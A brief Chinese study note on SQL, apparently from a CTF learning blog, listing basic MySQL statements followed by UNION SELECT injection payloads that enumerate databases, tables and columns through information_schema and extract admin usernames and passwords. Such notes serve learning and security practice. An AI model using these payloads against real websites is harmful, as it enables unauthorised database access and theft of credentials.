SQL注入笔记

show databases;
create database test;
use test;(切换到数据库test)
create table users ( id int(11), name varchar(255));
desc uers;{
    describe}
insert into users values(1,'mxq'),(2,'zstu');插入数据
select * from users;查询全部
select * from users order by id desc;(降序排序)
select *from users limit 1offset 0;(0开始的第一行)
update users set name='MXQ' where id=1;(改id为1的记录里name值为MXQ)
delete from users where id=1;
union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'news' 
union select 1,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = 'news' and TABLE_NAME='admin'
union select 1,group_concat(username) from news.admin
union select 1,group_concat(password) from news.admin where username='admin'
union select 1,group_concat(password) from news.admin

你可能感兴趣的:(CTF入坟)